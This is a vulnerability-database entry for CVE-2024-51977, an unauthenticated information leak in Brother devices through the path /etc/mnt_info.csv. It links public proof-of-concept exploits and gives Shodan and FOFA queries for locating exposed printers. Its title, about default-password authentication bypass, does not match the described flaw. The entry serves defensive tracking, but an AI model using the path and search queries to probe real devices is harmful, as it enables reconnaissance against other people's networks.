CVE-2024-51977

MEDIUM EXPLOITED NUCLEI

Multiple Brother devices authentication bypass via default administrator password generation

Title source: metasploit

Description

An unauthenticated attacker who can access either the HTTP service (TCP port 80), the HTTPS service (TCP port 443), or the IPP service (TCP port 631), can leak several pieces of sensitive information from a vulnerable device. The URI path /etc/mnt_info.csv can be accessed via a GET request and no authentication is required. The returned result is a comma separated value (CSV) table of information. The leaked information includes the device’s model, firmware version, IP address, and serial number.

Exploits (3)

github WORKING POC 40 stars

by iSee857 · pythonpoc

https://github.com/iSee857/CVE-PoC/tree/main/BrotherPrinters-CVE-2024-51977-InformationDisclosure.py

View Code ZIP pw:eip

nomisec WORKING POC 29 stars

by sfewer-r7 · infoleak

https://github.com/sfewer-r7/BrotherVulnerabilities

View Code ZIP pw:eip

metasploit WORKING POC

by sfewer-r7 · rubypoc

https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978.rb

View Code ZIP pw:eip

Nuclei Templates (1)

Brother MFC-L9570CDW - Information Disclosure

MEDIUMVERIFIEDby DhiyaneshDK,iamnoooob,darses

Shodan: html:"MFC-L9570CDW"

FOFA: app="brother-Printer"

References (11)

[Various Sources] https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faqp00100620_000

[Various Sources] https://www.fujifilm.com/fbglobal/eng/company/news/notice/2025/0625_announce.html

[Various Sources] https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2025-000007

[Various Sources] https://www.toshibatec.com/information/20250625_02.html

[Various Sources] https://assets.contentstack.io/v3/assets/blte4f029e766e6b253/blt6495b3c6adf2867f/685aa980a26c5e2b1026969c/vulnerability-disclosure-whitepaper.pdf

[Various Sources] https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-51977.yaml

[Various Sources] https://github.com/sfewer-r7/BrotherVulnerabilities

[Various Sources] https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faq00100846_000

[Various Sources] https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faq00100848_000

[Third Party Advisory] https://www.rapid7.com/blog/post/multiple-brother-devices-multiple-vulnerabilities-fixed

[Vendor Advisory] https://www.konicaminolta.com/global-en/security/advisory/pdf/km-2025-0001.pdf

Scores

CVSS v3 5.3

EPSS 0.3951

EPSS Percentile 97.2%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Exploitation Intel

VulnCheck KEV 2025-07-09

Classification

CWE

CWE-538

Status draft

Timeline

Published Jun 25, 2025

Tracked Since Feb 18, 2026